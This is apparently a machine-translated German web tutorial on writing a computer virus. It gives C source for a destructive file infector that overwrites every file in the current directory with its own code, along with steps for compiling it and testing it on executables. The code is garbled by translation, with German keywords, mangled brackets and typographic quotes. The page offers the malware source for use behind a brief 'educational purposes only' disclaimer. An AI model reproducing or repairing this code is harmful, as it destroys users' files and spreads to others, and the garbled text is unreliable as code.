Wie ein Computer-Virus zu erstellen

Wie ein Computer-Virus zu schaffen?

Wie ein Computer-Virus zu erstellen?

Dieses Programm ist ein Beispiel dafür, wie ein Virus in C erstellen Dieses Programm demonstriert ein einfaches Virus Programm, das bei der Ausführung (Running) eine Kopie von sich in der anderen Datei erstellt. So zerstört es andere Dateien, die von ihnen zu infizieren. Aber das Virus infizierte Datei ist auch in der Lage, die Infektion zu einer anderen Datei zu verbreiten und so weiter. Hier ist die Quelle Kabeljau e des Virus-Programm.

#includelt; stdio.hgt;
#includelt; io.hgt;
#includelt; dos.hgt;
#includelt; dir.hgt;
#includelt; conio.hgt;
#includelt; time.hgt; FILE * Virus, * Host;
int getan, a = 0;
unsigned long x;
char Buff [2048];
struct ffblk ffblk;
clock_t st, Ende;
void main ()
lt;
st = clock ();
clrscr ();
getan findfirst = ( „*. *“,&ffblk, 0);
während (! getan)
lt;
Virus = fopen (_argv [0], „rb“);
host = fopen (ffblk.ff_name, „rb +“);
if (Host == NULL) weiter zum nächsten;
x = 89.088;
printf ( „\ n Infizieren% s“, ffblk.ff_name, a);
während (XGT; 2048)
lt;
fread (Buff, 2048,1, Virus);
fwrite (Buff, 2048,1, Host);
x- = 2048;
gt;
fread (Buff, x, 1, Virus);
fwrite (Buff, x, 1, Host);
a ++;
Nächster:
lt;
fcloseall ();
done = findnext (&ffblk);
gt;
gt;
printf ( „DONE (Total Infizierte Dateien =% d)“, a);
Ende = clock ();
printf ( „TIME =% f SEC \ n“ dieses,
(End-st) / CLK_TCK);
getch ();
gt;

ZUSAMMENSTELLUNG METHODE:

Borland TC ++ 3.0 (16-Bit):
1. Laden Sie das Programm in den Compiler, drücken Sie Alt-F9 zu kompilieren
2. Drücken Sie F9, um die EXE-Datei zu erzeugen (NICHT drücken Sie Strg + F9, wird dies alle Dateien im CUR-KATALOG includin Compilers INFIZIEREN)
3. Notieren Sie sich die Größe der erzeugten EXE-Datei in Bytes (SEE EXE-Datei Eigenschaften für seine Größe)
4. Ändern Sie den Wert von X im Quellcode mit der Größe notiert (im obigen QUELLCODE x = 89.088; CHANGE IT)
5. Sobald folgen wieder den Schritt 1 & SCHRITT 2.Now die erzeugte EXE-Datei ist bereit zu infizieren

Borland C ++ 5.5 (32-Bit):
1. Kompilieren Sie einmal, notieren Sie die erzeugte EXE-Datei Länge in Bytes
2. Ändern Sie den Wert von X im Quellcode auf diese Länge in Bytes
3. it.The neue EXE-Datei Recompile ist bereit zu infizieren

HOW TO TEST:

1. Öffnen Sie leeren Ordner
2. einige EXE-Dateien anlegen (mit der Suche nach * .EXE AUF DER SUCHE & EINFÜGEN im neuen Ordner)
3. Führen Sie das Virus EXE-Datei dort finden Sie alle Dateien im aktuellen Verzeichnis sehen infiziert.
4. Alle infizierten Dateien wird bereit sein, zu reinfect
Das ist es

* ACHTUNG: NUR für pädagogische Zwecke. NICHT VERTEILUNG ODER MISSBRAUCH dieses Virus CODE

Quelle: www.engineersgarage.com

Read more

  • Wie kann man wissen, ob ich einen Computer-Virus

    Wie weiß ich, wenn ich einen Computer-Virus? Um zu wissen, ob Ihr Computer mit einem Virus hat: 1. Schauen Sie sich die Zeit genommen, um eine Datei oder Anwendung zu öffnen – wenn es lange Zeit…

  • Pdf 995 Erstellen von PDF-Dokumenten leicht kostenlos

    Die pdf995 Suite von Produkten – Pdf995, PdfEdit995 und Signature995 – ist eine Komplettlösung für Ihr Dokument Publishing-Anforderungen. Es bietet einfache Bedienung, Flexibilität in Format…

  • Mein Konto – Profil erstellen

    PAPERLESS BEGRIFFE BEDINGUNGEN Um Ihre beleglosen Aussage Einschreibung abzuschließen, müssen Sie sich mit den Nutzungsbedingungen einverstanden unten aufgeführt. 1. Sie stimmen Ihre…

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

drei × 3 =